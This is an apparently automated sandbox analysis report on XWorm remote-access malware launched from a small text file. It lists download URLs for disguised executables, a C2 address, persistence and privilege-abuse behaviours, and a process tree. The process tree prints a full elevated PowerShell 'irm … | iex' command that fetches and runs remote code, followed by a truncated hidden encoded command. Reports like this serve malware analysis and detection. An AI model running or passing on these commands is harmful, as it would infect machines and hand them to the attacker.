Analysis
-
max time kernel
56s -
max time network
59s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-01-2025 06:11
Static task
static1
General
-
Target
New Text Document.txt
-
Size
144B
-
MD5
af335e9be68e6153129d6c23d82557f0
-
SHA1
1ecbaeebd84c4783c2d644b95158c5ec4f285bf6
-
SHA256
3014e597f348e41aa380aed3f84ce042a7f5f9113fbeb08c6b6e450555541527
-
SHA512
f5268391fa1d4751e59901404cd26c4fdc3d982890b80addabd0194b3e5fc8dad747e7c93512bdc60f7274a9a4ee050617dcf9846f9ceb0108b16f9bb99e0336
Malware Config
Extracted
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe
https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe
Extracted
xworm
147.185.221.24:35724
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0028000000046357-279.dat family_xworm behavioral1/memory/4276-289-0x0000000000610000-0x0000000000626000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 29 1176 powershell.exe 31 1176 powershell.exe 54 2792 powershell.exe 56 2792 powershell.exe -
pid Process 1176 powershell.exe 2616 PowerShell.exe 3708 powershell.exe 864 powershell.exe 2792 powershell.exe 4264 powershell.exe 3304 powershell.exe 4736 powershell.exe 5060 powershell.exe 5112 powershell.exe 5112 powershell.exe 3668 powershell.exe 3540 powershell.exe 4736 powershell.exe 3304 powershell.exe 5060 powershell.exe 5448 powershell.exe 3996 powershell.exe 4264 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\Control Panel\International\Geo\Nation Discord.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Discord.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Discord.exe -
Executes dropped EXE 1 IoCs
pid Process 4276 Discord.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord" Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 30 raw.githubusercontent.com 31 raw.githubusercontent.com 56 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk PowerShell.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\39b540ba-437c-4974-8cf5-cd13d25f4120.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250124061213.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3720 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2616 PowerShell.exe 2616 PowerShell.exe 2616 PowerShell.exe 1176 powershell.exe 1176 powershell.exe 1176 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 864 powershell.exe 864 powershell.exe 864 powershell.exe 1580 msedge.exe 1580 msedge.exe 2792 powershell.exe 2792 powershell.exe 3988 msedge.exe 3988 msedge.exe 2792 powershell.exe 4264 powershell.exe 4264 powershell.exe 4264 powershell.exe 3304 powershell.exe 3304 powershell.exe 3304 powershell.exe 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5112 powershell.exe 5112 powershell.exe 5112 powershell.exe 640 identity_helper.exe 640 identity_helper.exe 3668 powershell.exe 3668 powershell.exe 3668 powershell.exe 5448 powershell.exe 5448 powershell.exe 5448 powershell.exe 3540 powershell.exe 3540 powershell.exe 3540 powershell.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe 3988 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2616 PowerShell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeIncreaseQuotaPrivilege 4264 powershell.exe Token: SeSecurityPrivilege 4264 powershell.exe Token: SeTakeOwnershipPrivilege 4264 powershell.exe Token: SeLoadDriverPrivilege 4264 powershell.exe Token: SeSystemProfilePrivilege 4264 powershell.exe Token: SeSystemtimePrivilege 4264 powershell.exe Token: SeProfSingleProcessPrivilege 4264 powershell.exe Token: SeIncBasePriorityPrivilege 4264 powershell.exe Token: SeCreatePagefilePrivilege 4264 powershell.exe Token: SeBackupPrivilege 4264 powershell.exe Token: SeRestorePrivilege 4264 powershell.exe Token: SeShutdownPrivilege 4264 powershell.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeSystemEnvironmentPrivilege 4264 powershell.exe Token: SeRemoteShutdownPrivilege 4264 powershell.exe Token: SeUndockPrivilege 4264 powershell.exe Token: SeManageVolumePrivilege 4264 powershell.exe Token: 33 4264 powershell.exe Token: 34 4264 powershell.exe Token: 35 4264 powershell.exe Token: 36 4264 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe Token: SeIncreaseQuotaPrivilege 3304 powershell.exe Token: SeSecurityPrivilege 3304 powershell.exe Token: SeTakeOwnershipPrivilege 3304 powershell.exe Token: SeLoadDriverPrivilege 3304 powershell.exe Token: SeSystemProfilePrivilege 3304 powershell.exe Token: SeSystemtimePrivilege 3304 powershell.exe Token: SeProfSingleProcessPrivilege 3304 powershell.exe Token: SeIncBasePriorityPrivilege 3304 powershell.exe Token: SeCreatePagefilePrivilege 3304 powershell.exe Token: SeBackupPrivilege 3304 powershell.exe Token: SeRestorePrivilege 3304 powershell.exe Token: SeShutdownPrivilege 3304 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe Token: SeSystemEnvironmentPrivilege 3304 powershell.exe Token: SeRemoteShutdownPrivilege 3304 powershell.exe Token: SeUndockPrivilege 3304 powershell.exe Token: SeManageVolumePrivilege 3304 powershell.exe Token: 33 3304 powershell.exe Token: 34 3304 powershell.exe Token: 35 3304 powershell.exe Token: 36 3304 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeIncreaseQuotaPrivilege 4736 powershell.exe Token: SeSecurityPrivilege 4736 powershell.exe Token: SeTakeOwnershipPrivilege 4736 powershell.exe Token: SeLoadDriverPrivilege 4736 powershell.exe Token: SeSystemProfilePrivilege 4736 powershell.exe Token: SeSystemtimePrivilege 4736 powershell.exe Token: SeProfSingleProcessPrivilege 4736 powershell.exe Token: SeIncBasePriorityPrivilege 4736 powershell.exe Token: SeCreatePagefilePrivilege 4736 powershell.exe Token: SeBackupPrivilege 4736 powershell.exe Token: SeRestorePrivilege 4736 powershell.exe Token: SeShutdownPrivilege 4736 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeSystemEnvironmentPrivilege 4736 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3988 msedge.exe 3988 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2616 wrote to memory of 1176 2616 PowerShell.exe 99 PID 2616 wrote to memory of 1176 2616 PowerShell.exe 99 PID 1176 wrote to memory of 3988 1176 powershell.exe 102 PID 1176 wrote to memory of 3988 1176 powershell.exe 102 PID 1176 wrote to memory of 3708 1176 powershell.exe 103 PID 1176 wrote to memory of 3708 1176 powershell.exe 103 PID 3988 wrote to memory of 4960 3988 msedge.exe 104 PID 3988 wrote to memory of 4960 3988 msedge.exe 104 PID 3708 wrote to memory of 864 3708 powershell.exe 105 PID 3708 wrote to memory of 864 3708 powershell.exe 105 PID 864 wrote to memory of 2792 864 powershell.exe 106 PID 864 wrote to memory of 2792 864 powershell.exe 106 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1656 3988 msedge.exe 107 PID 3988 wrote to memory of 1580 3988 msedge.exe 108 PID 3988 wrote to memory of 1580 3988 msedge.exe 108 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 PID 3988 wrote to memory of 5436 3988 msedge.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\NOTEPAD.EXEC:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"1⤵PID:4840
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff9da6746f8,0x7ff9da674708,0x7ff9da6747184⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:24⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:84⤵PID:5436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:14⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:14⤵PID:2596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:84⤵PID:5288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
PID:5452 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff70aed5460,0x7ff70aed5470,0x7ff70aed54805⤵PID:3372
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:14⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:14⤵PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:14⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:14⤵PID:4520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand p o w e r s h e l l   - N o P r o f i l e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - E n c o d e d C o m m a n d   " c A B v A H c A Z Q B y A H M A a A B l A G w A b A A g A C 0 A T g B v A F A A c g B v A G Y A a Q B s A G U A I A A t A E U A e A B l A G M A d Q B 0 A G k A b w B u A F A A b w B s A G k A Y w B 5 A C A A Q g B 5 A H A A Y Q B z A H M A I A A t A F c A a Q B u A G Q A b w B 3 A F M A d A B 5 A G w A Z Q A g A E g A a Q B k A G Q A Z Q B u A C A A L Q B F A G 4 A Y w B v A G Q A Z Q B k A E M A b w B t A G 0 A Y Q B u A G Q A I A A i A G M A Q Q B C A H Y A Q Q B I A G M A Q Q B a A F E A Q g B 5 A E E A S A B N A E E A Y Q B B A E I A b A B B A E c A d w B B A G I A Q Q B B A G c A Q Q B D A D A A Q Q B W A H c A Q g B w A E E A R w A 0 A E E A W g B B A E I A d g B B A E g A Y w B B A F U A d w B C A D A A Q Q B I A G s A Q Q B i A E E A Q g B s A E E A Q w B B A E E A U w B B A E I A c A B B A E c A U Q B B A F o A Q Q B C A G w A Q Q B H A D Q A Q Q B J A E E A Q Q B 0 A E E A R Q B N A E E A Y g B 3 A E I A d A B B A E c A M A B B A F k A U Q B C A H U A Q Q B H A F E A Q Q B J A E E A Q Q B p A E E A R Q B F A E E A W g B B A E I A a w B B A E M A M A B B A F Q A U Q B C A H c A Q Q B G A E E A Q Q B j A G c A Q g B s A E E A R w B Z A E E A W g B R A E I A e Q B B A E c A V Q B B A G I A Z w B C A G o A Q Q B H A F U A Q Q B J A E E A Q Q B 0 A E E A R Q B V A E E A Z Q B B A E I A a g B B A E c A d w B B A G Q A U Q B C A H o A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A R g B B A E E A W Q B R A E I A M A B B A E c A Z w B B A E k A Q Q B B A G 4 A Q Q B F A E 0 A Q Q B P A G c A Q g B j A E E A R g B B A E E A Y w B n A E I A d g B B A E c A Y w B B A G M A Z w B C A G g A Q Q B H A D A A Q Q B S A E E A Q g B o A E E A S A B R A E E A W Q B R A E E A b g B B A E M A S Q B B A E M A Z w B C A H c A Q Q B H A D g A Q Q B k A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A b w B B A E c A V Q B B A G I A Q Q B C A H M A Q Q B D A E E A Q Q B M A F E A Q g B Y A E E A R w B r A E E A Y g B n A E I A a w B B A E c A O A B B A G Q A d w B C A F Q A Q Q B I A F E A Q Q B l A F E A Q g B z A E E A R w B V A E E A S Q B B A E I A S Q B B A E c A a w B B A F o A Q Q B C A G s A Q Q B H A F U A Q Q B i A G c A Q Q B n A E E A Q w A w A E E A U Q B 3 A E I A d g B B A E c A M A B B A G I A U Q B C A G g A Q Q B H A D Q A Q Q B a A E E A Q Q B n A E E A Q w B J A E E A U Q B R A E I A a w B B A E c A U Q B B A E w A U Q B C A E 4 A Q Q B I A E E A Q Q B V A E E A Q g B 5 A E E A R w B V A E E A W g B n A E I A b A B B A E g A S Q B B A F o A U Q B C A H U A Q Q B H A E 0 A Q Q B a A F E A Q Q B n A E E A Q w A w A E E A U g B R A E I A N A B B A E c A T Q B B A G I A Q Q B C A D E A Q Q B I A E 0 A Q Q B h A F E A Q g B 2 A E E A R w A 0 A E E A V Q B B A E I A a A B B A E g A U Q B B A G E A Q Q B B A G c A Q Q B D A G M A Q Q B R A H c A Q Q A 2 A E E A R g B 3 A E E A V g B R A E I A e g B B A E c A V Q B B A G M A Z w B C A H o A Q Q B G A H c A Q Q B V A E E A Q g A x A E E A R w B J A E E A Y g B B A E I A c A B B A E c A T Q B B A F g A Q Q B C A E U A Q Q B H A D g A Q Q B k A H c A Q g B 1 A E E A R w B 3 A E E A Y g B 3 A E I A a A B B A E c A U Q B B A G M A d w B B A G 4 A Q Q B D A E k A Q Q B D A G c A Q g B 3 A E E A R w A 4 A E E A Z A B 3 A E I A b A B B A E g A S Q B B A G M A d w B C A G 8 A Q Q B H A F U A Q Q B i A E E A Q g B z A E E A Q w B B A E E A T A B R A E I A W A B B A E c A a w B B A G I A Z w B C A G s A Q Q B H A D g A Q Q B k A H c A Q g B U A E E A S A B R A E E A Z Q B R A E I A c w B B A E c A V Q B B A E k A Q Q B C A E k A Q Q B H A G s A Q Q B a A E E A Q g B r A E E A R w B V A E E A Y g B n A E E A Z w B B A E M A M A B B A F E A d w B C A H Y A Q Q B H A D A A Q Q B i A F E A Q g B o A E E A R w A 0 A E E A W g B B A E E A Z w B B A E M A S Q B B A F E A U Q B C A G s A Q Q B H A F E A Q Q B M A F E A Q g B O A E E A S A B B A E E A V Q B B A E I A e Q B B A E c A V Q B B A F o A Z w B C A G w A Q Q B I A E k A Q Q B a A F E A Q g B 1 A E E A R w B N A E E A W g B R A E E A Z w B B A E M A M A B B A F I A U Q B C A D Q A Q Q B H A E 0 A Q Q B i A E E A Q g A x A E E A S A B N A E E A Y Q B R A E I A d g B B A E c A N A B B A F U A Q Q B C A G g A Q Q B I A F E A Q Q B h A E E A Q Q B n A E E A Q w B j A E E A U Q B 3 A E E A N g B B A E Y A d w B B A F Y A d w B C A H A A Q Q B H A D Q A Q Q B a A E E A Q g B 2 A E E A S A B j A E E A Y w B 3 A E I A Y w B B A E Y A T Q B B A G U A U Q B C A H o A Q Q B I A F E A Q Q B a A F E A Q g B 0 A E E A R A B N A E E A T Q B n A E E A b g B B A E M A S Q B B A E M A Z w B C A H c A Q Q B H A D g A Q Q B k A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A b w B B A E c A V Q B B A G I A Q Q B C A H M A Q Q B D A E E A Q Q B M A F E A Q g B Y A E E A R w B r A E E A Y g B n A E I A a w B B A E c A O A B B A G Q A d w B C A F Q A Q Q B I A F E A Q Q B l A F E A Q g B z A E E A R w B V A E E A S Q B B A E I A S Q B B A E c A a w B B A F o A Q Q B C A G s A Q Q B H A F U A Q Q B i A G c A Q Q B n A E E A Q w A w A E E A U Q B 3 A E I A d g B B A E c A M A B B A G I A U Q B C A G g A Q Q B H A D Q A Q Q B a A E E A Q Q B n A E E A Q w B J A E E A U Q B R A E I A a w B B A E c A U Q B B A E w A U Q B C A E 4 A Q Q B I A E E A Q Q B V A E E A Q g B 5 A E E A R w B V A E E A W g B n A E I A b A B B A E g A S Q B B A F o A U Q B C A H U A Q Q B H A E 0 A Q Q B a A F E A Q Q B n A E E A Q w A w A E E A U g B R A E I A N A B B A E c A T Q B B A G I A Q Q B C A D E A Q Q B I A E 0 A Q Q B h A F E A Q g B 2 A E E A R w A 0 A E E A V Q B B A E I A a A B B A E g A U Q B B A G E A Q Q B B A G c A Q Q B D A G M A Q Q B R A H c A Q Q A 2 A E E A R g B 3 A E E A V g B 3 A E I A c A B B A E c A N A B B A F o A Q Q B C A H Y A Q Q B I A G M A Q Q B j A H c A Q g B j A E E A R g B N A E E A Z Q B R A E I A e g B B A E Y A Y w B B A F Q A d w B C A F g A Q Q B E A F k A Q Q B O A E E A Q Q B u A E E A Q w B J A E E A Q w B n A E I A d w B B A E c A O A B B A G Q A d w B C A G w A Q Q B I A E k A Q Q B j A H c A Q g B v A E E A R w B V A E E A Y g B B A E I A c w B B A E M A Q Q B B A E w A U Q B C A F g A Q Q B H A G s A Q Q B i A G c A Q g B r A E E A R w A 4 A E E A Z A B 3 A E I A V A B B A E g A U Q B B A G U A U Q B C A H M A Q Q B H A F U A Q Q B J A E E A Q g B J A E E A R w B r A E E A W g B B A E I A a w B B A E c A V Q B B A G I A Z w B B A G c A Q Q B D A D A A Q Q B R A H c A Q g B 2 A E E A R w A w A E E A Y g B R A E I A a A B B A E c A N A B B A F o A Q Q B B A G c A Q Q B D A E k A Q Q B R A F E A Q g B r A E E A R w B R A E E A T A B R A E I A T g B B A E g A Q Q B B A F U A Q Q B C A H k A Q Q B H A F U A Q Q B a A G c A Q g B s A E E A S A B J A E E A W g B R A E I A d Q B B A E c A T Q B B A F o A U Q B B A G c A Q Q B D A D A A Q Q B S A F E A Q g A 0 A E E A R w B N A E E A Y g B B A E I A M Q B B A E g A T Q B B A G E A U Q B C A H Y A Q Q B H A D Q A Q Q B V A E E A Q g B o A E E A S A B R A E E A Y Q B B A E E A Z w B B A E M A Y w B B A F E A d w B B A D Y A Q Q B G A H c A Q Q B W A H c A Q g B w A E E A R w A 0 A E E A